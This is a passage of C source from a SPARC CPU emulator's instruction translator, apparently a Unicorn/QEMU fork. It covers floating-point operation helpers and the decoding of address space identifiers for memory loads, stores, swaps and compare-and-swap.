gen_load_fpr_D(dc, rs1); src2 = gen_load_fpr_D(dc, rs2); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, tcg_ctx->cpu_gsr, src1, src2); gen_store_fpr_D(dc, rd, dst); } static inline void gen_ne_fop_DDDD(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst, src0, src1, src2; src1 = gen_load_fpr_D(dc, rs1); src2 = gen_load_fpr_D(dc, rs2); src0 = gen_load_fpr_D(dc, rd); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, src0, src1, src2); gen_store_fpr_D(dc, rd, dst); } #endif static inline void gen_fop_QQ(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_ptr)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; gen_op_load_fpr_QT1(tcg_ctx, QFPREG(rs)); gen(tcg_ctx, tcg_ctx->cpu_env); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_op_store_QT0_fpr(tcg_ctx, QFPREG(rd)); gen_update_fprs_dirty(dc, QFPREG(rd)); } #ifdef TARGET_SPARC64 static inline void gen_ne_fop_QQ(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_ptr)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; gen_op_load_fpr_QT1(tcg_ctx, QFPREG(rs)); gen(tcg_ctx, tcg_ctx->cpu_env); gen_op_store_QT0_fpr(tcg_ctx, QFPREG(rd)); gen_update_fprs_dirty(dc, QFPREG(rd)); } #endif static inline void gen_fop_QQQ(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_ptr)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; gen_op_load_fpr_QT0(tcg_ctx, QFPREG(rs1)); gen_op_load_fpr_QT1(tcg_ctx, QFPREG(rs2)); gen(tcg_ctx, tcg_ctx->cpu_env); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_op_store_QT0_fpr(tcg_ctx, QFPREG(rd)); gen_update_fprs_dirty(dc, QFPREG(rd)); } static inline void gen_fop_DFF(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_i32, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst; TCGv_i32 src1, src2; src1 = gen_load_fpr_F(dc, rs1); src2 = gen_load_fpr_F(dc, rs2); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src1, src2); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_D(dc, rd, dst); } static inline void gen_fop_QDD(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_ptr, TCGv_i64, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 src1, src2; src1 = gen_load_fpr_D(dc, rs1); src2 = gen_load_fpr_D(dc, rs2); gen(tcg_ctx, tcg_ctx->cpu_env, src1, src2); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_op_store_QT0_fpr(tcg_ctx, QFPREG(rd)); gen_update_fprs_dirty(dc, QFPREG(rd)); } #ifdef TARGET_SPARC64 static inline void gen_fop_DF(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst; TCGv_i32 src; src = gen_load_fpr_F(dc, rs); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_D(dc, rd, dst); } #endif static inline void gen_ne_fop_DF(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst; TCGv_i32 src; src = gen_load_fpr_F(dc, rs); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); gen_store_fpr_D(dc, rd, dst); } static inline void gen_fop_FD(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 dst; TCGv_i64 src; src = gen_load_fpr_D(dc, rs); dst = gen_dest_fpr_F(dc); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_F(dc, rd, dst); } static inline void gen_fop_FQ(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i32, TCGv_ptr)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 dst; gen_op_load_fpr_QT1(tcg_ctx, QFPREG(rs)); dst = gen_dest_fpr_F(dc); gen(tcg_ctx, dst, tcg_ctx->cpu_env); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_F(dc, rd, dst); } static inline void gen_fop_DQ(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i64, TCGv_ptr)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst; gen_op_load_fpr_QT1(tcg_ctx, QFPREG(rs)); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, tcg_ctx->cpu_env); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_D(dc, rd, dst); } static inline void gen_ne_fop_QF(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_ptr, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 src; src = gen_load_fpr_F(dc, rs); gen(tcg_ctx, tcg_ctx->cpu_env, src); gen_op_store_QT0_fpr(tcg_ctx, QFPREG(rd)); gen_update_fprs_dirty(dc, QFPREG(rd)); } static inline void gen_ne_fop_QD(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_ptr, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 src; src = gen_load_fpr_D(dc, rs); gen(tcg_ctx, tcg_ctx->cpu_env, src); gen_op_store_QT0_fpr(tcg_ctx, QFPREG(rd)); gen_update_fprs_dirty(dc, QFPREG(rd)); } static void gen_swap(DisasContext *dc, TCGv dst, TCGv src, TCGv addr, int mmu_idx, MemOp memop) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; gen_address_mask(dc, addr); tcg_gen_atomic_xchg_tl(tcg_ctx, dst, addr, src, mmu_idx, memop); } static void gen_ldstub(DisasContext *dc, TCGv dst, TCGv addr, int mmu_idx) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv m1 = tcg_const_tl(tcg_ctx, 0xff); gen_address_mask(dc, addr); tcg_gen_atomic_xchg_tl(tcg_ctx, dst, addr, m1, mmu_idx, MO_UB); tcg_temp_free(tcg_ctx, m1); } /* asi moves */ typedef enum { GET_ASI_HELPER, GET_ASI_EXCP, GET_ASI_DIRECT, GET_ASI_DTWINX, GET_ASI_BLOCK, GET_ASI_SHORT, GET_ASI_BCOPY, GET_ASI_BFILL, } ASIType; typedef struct { ASIType type; int asi; int mem_idx; MemOp memop; } DisasASI; static DisasASI get_asi(DisasContext *dc, int insn, MemOp memop) { int asi = GET_FIELD(insn, 19, 26); ASIType type = GET_ASI_HELPER; int mem_idx = dc->mem_idx; #ifndef TARGET_SPARC64 /* Before v9, all asis are immediate and privileged. */ if (IS_IMM) { gen_exception(dc, TT_ILL_INSN); type = GET_ASI_EXCP; } else if (supervisor(dc) /* Note that LEON accepts ASI_USERDATA in user mode, for use with CASA. Also note that previous versions of QEMU allowed (and old versions of gcc emitted) ASI_P for LEON, which is incorrect. */ || (asi == ASI_USERDATA && (dc->def->features & CPU_FEATURE_CASA))) { switch (asi) { case ASI_USERDATA: /* User data access */ mem_idx = MMU_USER_IDX; type = GET_ASI_DIRECT; break; case ASI_KERNELDATA: /* Supervisor data access */ mem_idx = MMU_KERNEL_IDX; type = GET_ASI_DIRECT; break; case ASI_M_BYPASS: /* MMU passthrough */ case ASI_LEON_BYPASS: /* LEON MMU passthrough */ mem_idx = MMU_PHYS_IDX; type = GET_ASI_DIRECT; break; case ASI_M_BCOPY: /* Block copy, sta access */ mem_idx = MMU_KERNEL_IDX; type = GET_ASI_BCOPY; break; case ASI_M_BFILL: /* Block fill, stda access */ mem_idx = MMU_KERNEL_IDX; type = GET_ASI_BFILL; break; } /* MMU_PHYS_IDX is used when the MMU is disabled to passthrough the * permissions check in get_physical_address(..). */ mem_idx = (dc->mem_idx == MMU_PHYS_IDX) ? MMU_PHYS_IDX : mem_idx; } else { gen_exception(dc, TT_PRIV_INSN); type = GET_ASI_EXCP; } #else if (IS_IMM) { asi = dc->asi; } /* With v9, all asis below 0x80 are privileged. */ /* ??? We ought to check cpu_has_hypervisor, but we didn't copy down that bit into DisasContext. For the moment that's ok, since the direct implementations below doesn't have any ASIs in the restricted [0x30, 0x7f] range, and the check will be done properly in the helper. */ if (!supervisor(dc) && asi < 0x80) { gen_exception(dc, TT_PRIV_ACT); type = GET_ASI_EXCP; } else { switch (asi) { case ASI_REAL: /* Bypass */ case ASI_REAL_IO: /* Bypass, non-cacheable */ case ASI_REAL_L: /* Bypass LE */ case ASI_REAL_IO_L: /* Bypass, non-cacheable LE */ case ASI_TWINX_REAL: /* Real address, twinx */ case ASI_TWINX_REAL_L: /* Real address, twinx, LE */ case ASI_QUAD_LDD_PHYS: case ASI_QUAD_LDD_PHYS_L: mem_idx = MMU_PHYS_IDX; break; case ASI_N: /* Nucleus */ case ASI_NL: /* Nucleus LE */ case ASI_TWINX_N: case ASI_TWINX_NL: case ASI_NUCLEUS_QUAD_LDD: case ASI_NUCLEUS_QUAD_LDD_L: if (hypervisor(dc)) { mem_idx = MMU_PHYS_IDX; } else { mem_idx = MMU_NUCLEUS_IDX; } break; case ASI_AIUP: /* As if user primary */ case ASI_AIUPL: /* As if user primary LE */ case ASI_TWINX_AIUP: case ASI_TWINX_AIUP_L: case ASI_BLK_AIUP_4V: case ASI_BLK_AIUP_L_4V: case ASI_BLK_AIUP: case ASI_BLK_AIUPL: mem_idx = MMU_USER_IDX; break; case ASI_AIUS: /* As if user secondary */ case ASI_AIUSL: /* As if user secondary LE */ case ASI_TWINX_AIUS: case ASI_TWINX_AIUS_L: case ASI_BLK_AIUS_4V: case ASI_BLK_AIUS_L_4V: case ASI_BLK_AIUS: case ASI_BLK_AIUSL: mem_idx = MMU_USER_SECONDARY_IDX; break; case ASI_S: /* Secondary */ case ASI_SL: /* Secondary LE */ case ASI_TWINX_S: case ASI_TWINX_SL: case ASI_BLK_COMMIT_S: case ASI_BLK_S: case ASI_BLK_SL: case ASI_FL8_S: case ASI_FL8_SL: case ASI_FL16_S: case ASI_FL16_SL: if (mem_idx == MMU_USER_IDX) { mem_idx = MMU_USER_SECONDARY_IDX; } else if (mem_idx == MMU_KERNEL_IDX) { mem_idx = MMU_KERNEL_SECONDARY_IDX; } break; case ASI_P: /* Primary */ case ASI_PL: /* Primary LE */ case ASI_TWINX_P: case ASI_TWINX_PL: case ASI_BLK_COMMIT_P: case ASI_BLK_P: case ASI_BLK_PL: case ASI_FL8_P: case ASI_FL8_PL: case ASI_FL16_P: case ASI_FL16_PL: break; } switch (asi) { case ASI_REAL: case ASI_REAL_IO: case ASI_REAL_L: case ASI_REAL_IO_L: case ASI_N: case ASI_NL: case ASI_AIUP: case ASI_AIUPL: case ASI_AIUS: case ASI_AIUSL: case ASI_S: case ASI_SL: case ASI_P: case ASI_PL: type = GET_ASI_DIRECT; break; case ASI_TWINX_REAL: case ASI_TWINX_REAL_L: case ASI_TWINX_N: case ASI_TWINX_NL: case ASI_TWINX_AIUP: case ASI_TWINX_AIUP_L: case ASI_TWINX_AIUS: case ASI_TWINX_AIUS_L: case ASI_TWINX_P: case ASI_TWINX_PL: case ASI_TWINX_S: case ASI_TWINX_SL: case ASI_QUAD_LDD_PHYS: case ASI_QUAD_LDD_PHYS_L: case ASI_NUCLEUS_QUAD_LDD: case ASI_NUCLEUS_QUAD_LDD_L: type = GET_ASI_DTWINX; break; case ASI_BLK_COMMIT_P: case ASI_BLK_COMMIT_S: case ASI_BLK_AIUP_4V: case ASI_BLK_AIUP_L_4V: case ASI_BLK_AIUP: case ASI_BLK_AIUPL: case ASI_BLK_AIUS_4V: case ASI_BLK_AIUS_L_4V: case ASI_BLK_AIUS: case ASI_BLK_AIUSL: case ASI_BLK_S: case ASI_BLK_SL: case ASI_BLK_P: case ASI_BLK_PL: type = GET_ASI_BLOCK; break; case ASI_FL8_S: case ASI_FL8_SL: case ASI_FL8_P: case ASI_FL8_PL: memop = MO_UB; type = GET_ASI_SHORT; break; case ASI_FL16_S: case ASI_FL16_SL: case ASI_FL16_P: case ASI_FL16_PL: memop = MO_TEUW; type = GET_ASI_SHORT; break; } /* The little-endian asis all have bit 3 set. */ if (asi & 8) { memop ^= MO_BSWAP; } } #endif return (DisasASI){ type, asi, mem_idx, memop }; } static void gen_ld_asi(DisasContext *dc, TCGv dst, TCGv addr, int insn, MemOp memop) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, memop); switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DTWINX: /* Reserved for ldda. */ gen_exception(dc, TT_ILL_INSN); break; case GET_ASI_DIRECT: gen_address_mask(dc, addr); tcg_gen_qemu_ld_tl(tcg_ctx, dst, addr, da.mem_idx, da.memop); break; default: { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, memop); save_state(dc); #ifdef TARGET_SPARC64 gen_helper_ld_asi(tcg_ctx, dst, tcg_ctx->cpu_env, addr, r_asi, r_mop); #else { TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); gen_helper_ld_asi(tcg_ctx, t64, tcg_ctx->cpu_env, addr, r_asi, r_mop); tcg_gen_trunc_i64_tl(tcg_ctx, dst, t64); tcg_temp_free_i64(tcg_ctx, t64); } #endif tcg_temp_free_i32(tcg_ctx, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); } break; } } static void gen_st_asi(DisasContext *dc, TCGv src, TCGv addr, int insn, MemOp memop) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, memop); switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DTWINX: /* Reserved for stda. */ #ifndef TARGET_SPARC64 gen_exception(dc, TT_ILL_INSN); break; #else if (!(dc->def->features & CPU_FEATURE_HYPV)) { /* Pre OpenSPARC CPUs don't have these */ gen_exception(dc, TT_ILL_INSN); return; } /* in OpenSPARC T1+ CPUs TWINX ASIs in store instructions * are ST_BLKINIT_ ASIs */ /* fall through */ #endif case GET_ASI_DIRECT: gen_address_mask(dc, addr); tcg_gen_qemu_st_tl(tcg_ctx, src, addr, da.mem_idx, da.memop); break; #if !defined(TARGET_SPARC64) case GET_ASI_BCOPY: /* Copy 32 bytes from the address in SRC to ADDR. */ /* ??? The original qemu code suggests 4-byte alignment, dropping the low bits, but the only place I can see this used is in the Linux kernel with 32 byte alignment, which would make more sense as a cacheline-style operation. */ { TCGv saddr = tcg_temp_new(tcg_ctx); TCGv daddr = tcg_temp_new(tcg_ctx); TCGv four = tcg_const_tl(tcg_ctx, 4); TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); int i; tcg_gen_andi_tl(tcg_ctx, saddr, src, -4); tcg_gen_andi_tl(tcg_ctx, daddr, addr, -4); for (i = 0; i < 32; i += 4) { /* Since the loads and stores are paired, allow the copy to happen in the host endianness. */ tcg_gen_qemu_ld_i32(tcg_ctx, tmp, saddr, da.mem_idx, MO_UL); tcg_gen_qemu_st_i32(tcg_ctx, tmp, daddr, da.mem_idx, MO_UL); tcg_gen_add_tl(tcg_ctx, saddr, saddr, four); tcg_gen_add_tl(tcg_ctx, daddr, daddr, four); } tcg_temp_free(tcg_ctx, saddr); tcg_temp_free(tcg_ctx, daddr); tcg_temp_free(tcg_ctx, four); tcg_temp_free_i32(tcg_ctx, tmp); } break; #endif default: { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, memop & MO_SIZE); save_state(dc); #ifdef TARGET_SPARC64 gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, src, r_asi, r_mop); #else { TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, t64, src); gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, t64, r_asi, r_mop); tcg_temp_free_i64(tcg_ctx, t64); } #endif tcg_temp_free_i32(tcg_ctx, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); /* A write to a TLB register may alter page maps. End the TB. */ dc->npc = DYNAMIC_PC; } break; } } static void gen_swap_asi(DisasContext *dc, TCGv dst, TCGv src, TCGv addr, int insn) { DisasASI da = get_asi(dc, insn, MO_TEUL); switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DIRECT: gen_swap(dc, dst, src, addr, da.mem_idx, da.memop); break; default: /* ??? Should be DAE_invalid_asi. */ gen_exception(dc, TT_DATA_ACCESS); break; } } static void gen_cas_asi(DisasContext *dc, TCGv addr, TCGv cmpv, int insn, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, MO_TEUL); TCGv oldv; switch (da.type) { case GET_ASI_EXCP: return; case GET_ASI_DIRECT: oldv = tcg_temp_new(tcg_ctx); tcg_gen_atomic_cmpxchg_tl(tcg_ctx, oldv, addr, cmpv, gen_load_gpr(dc, rd), da.mem_idx, da.memop); gen_store_gpr(dc, rd, oldv); tcg_temp_free(tcg_ctx, oldv); break; default: /* ??? Should be DAE_invalid_asi. */ gen_exception(dc, TT_DATA_ACCESS); break; } } static void gen_ldstub_asi(DisasContext *dc, TCGv dst, TCGv addr, int insn) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, MO_UB); switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DIRECT: gen_ldstub(dc, dst, addr, da.mem_idx); break; default: /* ??? In theory, this should be raise DAE_invalid_asi. But the SS-20 roms do ldstuba [%l0] #ASI_M_CTL, %o1. */ if (tb_cflags(dc->base.tb) & CF_PARALLEL) { gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); } else { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, MO_UB); TCGv_i64 s64, t64; save_state(dc); t64 = tcg_temp_new_i64(tcg_ctx); gen_helper_ld_asi(tcg_ctx, t64, tcg_ctx->cpu_env, addr, r_asi, r_mop); s64 = tcg_const_i64(tcg_ctx, 0xff); gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, s64, r_asi, r_mop); tcg_temp_free_i64(tcg_ctx, s64); tcg_temp_free_i32(tcg_ctx, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); tcg_gen_trunc_i64_tl(tcg_ctx, dst, t64); tcg_temp_free_i64(tcg_ctx, t64); /* End the TB. */ dc->npc = DYNAMIC_PC; } break; } } #ifdef TARGET_SPARC64 static void gen_ldf_asi(DisasContext *dc, TCGv addr, int insn, int size, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, (size == 4 ? MO_TEUL : MO_TEQ)); TCGv_i32 d32; TCGv_i64 d64; switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DIRECT: gen_address_mask(dc, addr); switch (size) { case 4: d32 = gen_dest_fpr_F(dc); tcg_gen_qemu_ld_i32(tcg_ctx, d32, addr, da.mem_idx, da.memop); gen_store_fpr_F(dc, rd, d32); break; case 8: tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], addr, da.mem_idx, da.memop | MO_ALIGN_4); break; case 16: d64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, d64, addr, da.mem_idx, da.memop | MO_ALIGN_4); tcg_gen_addi_tl(tcg_ctx, addr, addr, 8); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd/2+1], addr, da.mem_idx, da.memop | MO_ALIGN_4); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], d64); tcg_temp_free_i64(tcg_ctx, d64); break; default: g_assert_not_reached(); } break; case GET_ASI_BLOCK: /* Valid for lddfa on aligned registers only. */ if (size == 8 && (rd & 7) == 0) { MemOp memop; TCGv eight; int i; gen_address_mask(dc, addr); /* The first operation checks required alignment. */ memop = da.memop | MO_ALIGN_64; eight = tcg_const_tl(tcg_ctx, 8); for (i = 0; ; ++i) { tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2 + i], addr, da.mem_idx, memop); if (i == 7) { break; } tcg_gen_add_tl(tcg_ctx, addr, addr, eight); memop = da.memop; } tcg_temp_free(tcg_ctx, eight); } else { gen_exception(dc, TT_ILL_INSN); } break; case GET_ASI_SHORT: /* Valid for lddfa only. */ if (size == 8) { gen_address_mask(dc, addr); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], addr, da.mem_idx, da.memop); } else { gen_exception(dc, TT_ILL_INSN); } break; default: { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, da.memop); save_state(dc); /* According to the table in the UA2011 manual, the only other asis that are valid for ldfa/lddfa/ldqfa are the NO_FAULT asis. We still need a helper for these, but we can just use the integer asi helper for them. */ switch (size) { case 4: d64 = tcg_temp_new_i64(tcg_ctx); gen_helper_ld_asi(tcg_ctx, d64, tcg_ctx->cpu_env, addr, r_asi, r_mop); d32 = gen_dest_fpr_F(dc); tcg_gen_extrl_i64_i32(tcg_ctx, d32, d64); tcg_temp_free_i64(tcg_ctx, d64); gen_store_fpr_F(dc, rd, d32); break; case 8: gen_helper_ld_asi(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], tcg_ctx->cpu_env, addr, r_asi, r_mop); break; case 16: d64 = tcg_temp_new_i64(tcg_ctx); gen_helper_ld_asi(tcg_ctx, d64, tcg_ctx->cpu_env, addr, r_asi, r_mop); tcg_gen_addi_tl(tcg_ctx, addr, addr, 8); gen_helper_ld_asi(tcg_ctx, tcg_ctx->cpu_fpr[rd/2+1], tcg_ctx->cpu_env, addr, r_asi, r_mop); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], d64); tcg_temp_free_i64(tcg_ctx, d64); break; default: g_assert_not_reached(); } tcg_temp_free_i32(tcg_ctx, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); } break; } } static void gen_stf_asi(DisasContext *dc, TCGv addr, int insn, int size, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, (size == 4 ? MO_TEUL : MO_TEQ)); TCGv_i32 d32; switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DIRECT: gen_address_mask(dc, addr); switch (size) { case 4: d32 = gen_load_fpr_F(dc, rd); tcg_gen_qemu_st_i32(tcg_ctx, d32, addr, da.mem_idx, da.memop); break; case 8: tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], addr, da.mem_idx, da.memop | MO_ALIGN_4); break; case 16: /* Only 4-byte alignment required. However, it is legal for the cpu to signal the alignment fault, and the OS trap handler is required to fix it up. Requiring 16-byte alignment here avoids having to probe the second page before performing the first write. */ tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], addr, da.mem_idx, da.memop | MO_ALIGN_16); tcg_gen_addi_tl(tcg_ctx, addr, addr, 8); tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd/2+1], addr, da.mem_idx, da.memop); break; default: g_assert_not_reached(); } break; case GET_ASI_BLOCK: /* Valid for stdfa on aligned registers only. */ if (size == 8 && (rd & 7) == 0) { MemOp memop; TCGv eight; int i; gen_address_mask(dc, addr); /* The first operation checks required alignment. */ memop = da.memop | MO_ALIGN_64; eight = tcg_const_tl(tcg_ctx, 8); for (i = 0; ; ++i) { tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2 + i], addr, da.mem_idx, memop); if (i == 7) { break; } tcg_gen_add_tl(tcg_ctx, addr, addr, eight); memop = da.memop; } tcg_temp_free(tcg_ctx, eight); } else { gen_exception(dc, TT_ILL_INSN); } break; case GET_ASI_SHORT: /* Valid for stdfa only. */ if (size == 8) { gen_address_mask(dc, addr); tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], addr, da.mem_idx, da.memop); } else { gen_exception(dc, TT_ILL_INSN); } break; default: /* According to the table in the UA2011 manual, the only other asis that are valid for ldfa/lddfa/ldqfa are the PST* asis, which aren't currently handled. */ gen_exception(dc, TT_ILL_INSN); break; } } static void gen_ldda_asi(DisasContext *dc, TCGv addr, int insn, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, MO_TEQ); TCGv_i64 hi = gen_dest_gpr(dc, rd); TCGv_i64 lo = gen_dest_gpr(dc, rd + 1); switch (da.type) { case GET_ASI_EXCP: return; case GET_ASI_DTWINX: gen_address_mask(dc, addr); tcg_gen_qemu_ld_i64(tcg_ctx, hi, addr, da.mem_idx, da.memop | MO_ALIGN_16); tcg_gen_addi_tl(tcg_ctx, addr, addr, 8); tcg_gen_qemu_ld_i64(tcg_ctx, lo, addr, da.mem_idx, da.memop); break; case GET_ASI_DIRECT: { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_address_mask(dc, addr); tcg_gen_qemu_ld_i64(tcg_ctx, tmp, addr, da.mem_idx, da.memop); /* Note that LE ldda acts as if each 32-bit register result is byte swapped. Having just performed one 64-bit bswap, we need now to swap the writebacks. */ if ((da.memop & MO_BSWAP) == MO_TE) { tcg_gen_extr32_i64(tcg_ctx, lo, hi, tmp); } else { tcg_gen_extr32_i64(tcg_ctx, hi, lo, tmp); } tcg_temp_free_i64(tcg_ctx, tmp); } break; default: /* ??? In theory we've handled all of the ASIs that are valid for ldda, and this should raise DAE_invalid_asi. However, real hardware allows others. This can be seen with e.g. FreeBSD 10.3 wrt ASI_IC_TAG. */ { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, da.memop); TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); save_state(dc); gen_helper_ld_asi(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, r_asi, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); tcg_temp_free_i32(tcg_ctx, r_mop); /* See above. */ if ((da.memop & MO_BSWAP) == MO_TE) { tcg_gen_extr32_i64(tcg_ctx, lo, hi, tmp); } else { tcg_gen_extr32_i64(tcg_ctx, hi, lo, tmp); } tcg_temp_free_i64(tcg_ctx, tmp); } break; } gen_store_gpr(dc, rd, hi); gen_store_gpr(dc, rd + 1, lo); } static void gen_stda_asi(DisasContext *dc, TCGv hi, TCGv addr, int insn, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, MO_TEQ); TCGv lo = gen_load_gpr(dc, rd + 1); switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DTWINX: gen_address_mask(dc, addr); tcg_gen_qemu_st_i64(tcg_ctx, hi, addr, da.mem_idx, da.memop | MO_ALIGN_16); tcg_gen_addi_tl(tcg_ctx, addr, addr, 8); tcg_gen_qemu_st_i64(tcg_ctx, lo, addr, da.mem_idx, da.memop); break; case GET_ASI_DIRECT: { TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); /* Note that LE stda acts as if each 32-bit register result is byte swapped. We will perform one 64-bit LE store, so now we must swap the order of the construction. */ if ((da.memop & MO_BSWAP) == MO_TE) { tcg_gen_concat32_i64(tcg_ctx, t64, lo, hi); } else { tcg_gen_concat32_i64(tcg_ctx, t64, hi, lo); } gen_address_mask(dc, addr); tcg_gen_qemu_st_i64(tcg_ctx, t64, addr, da.mem_idx, da.memop); tcg_temp_free_i64(tcg_ctx, t64); } break; default: /* ??? In theory we've handled all of the ASIs that are valid for stda, and this should raise DAE_invalid_asi. */ { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, da.memop); TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); /* See above. */ if ((da.memop & MO_BSWAP) == MO_TE) { tcg_gen_concat32_i64(tcg_ctx, t64, lo, hi); } else { tcg_gen_concat32_i64(tcg_ctx, t64, hi, lo); } save_state(dc); gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, 